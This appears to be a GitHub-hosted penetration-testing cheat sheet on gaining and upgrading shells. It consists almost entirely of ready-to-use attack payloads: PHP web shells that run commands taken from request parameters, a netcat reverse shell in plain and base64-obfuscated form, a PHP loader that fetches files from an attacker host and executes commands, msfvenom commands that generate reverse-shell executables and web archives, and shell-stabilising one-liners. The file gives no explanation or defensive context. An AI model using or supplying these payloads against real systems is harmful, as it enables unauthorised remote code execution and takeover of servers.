-
Notifications
You must be signed in to change notification settings - Fork 51
/
5 - Shells
93 lines (55 loc) · 2.48 KB
/
5 - Shells
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
#with PHP
----------------------------------------------------------------------------------------------------------
<?php system($_GET["cmd"]); ?>
<?php echo shell_exec($_GET["cmd"]); ?>
<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <victim_ip> 3333 >/tmp/f');?>
<?php exec(base64_decode('cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnwvYmluL3NoIC1pIDI+JjF8bmMgMTxhdHRhY2tlcl9pcD4gPGF0dGFja2VyX3BvcnQ+ID4vdG1wL2Y=')); ?>
##Secure, simple PHP shell to load and execute code;
if (isset($_REQUEST['fupload'])) {
file_put_contents($_REQUEST['fupload'], file_get_contents("http://<attacker_ip>:8000/" . $_REQUEST['fupload']));
};
if (isset($_REQUEST['fexec'])) {
echo "<pre>" . shell_exec($_REQUEST['fexec']) . "</pre>";
};
##Start the listener on the attacker machine;
nc -lvp 1234
##Call the script and get the shell;
http://10.10.10.9/catch.php?fexec=nc.exe <attacker_ip> 1234 -e cmd.exe```
------------------------------------------------------------------------------------------------------------------------------
#with Msfvenom
##Listing payloads (spesific);
msfvenom -l payloads | grep "cmd/unix" | awk '{print $1}'
.exe;
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=1337 -f exe > asd.exe
.aspx
msfvenom -p windows/shell_reverse_tcp LHOST=<attacker_ip> LPORT=4444 -f aspx > asd.aspx
.jsp
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<attacker_ip> LPORT=3333 -f raw > asd.jsp
.war
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<attacker_ip> LPORT=3333 -f war > shell.war
----------------------------------------------------------------------------------------------------------
#with Kali
/usr/share/laudanum/
----------------------------------------------------------------------------------------------------------
#with online reverse shell
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
----------------------------------------------------------------------------------------------------------
#Upgrading simple shells to fully interactive TTYs
##With bash;
/bin/bash -i
##With sh;
/bin/sh -i
##With echo;
echo 'os.system('/bin/bash')'
##With python;
python -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/sh")'
##With mawk;
mawk 'BEGIN {system("/bin/sh")}'
##With perl;
perl —e 'exec "/bin/sh";'
##Completing long file paths;
CTRL +Z
stty raw -echo
fg + [Enter x 2]
----------------------------------------------------------------------------------------------------------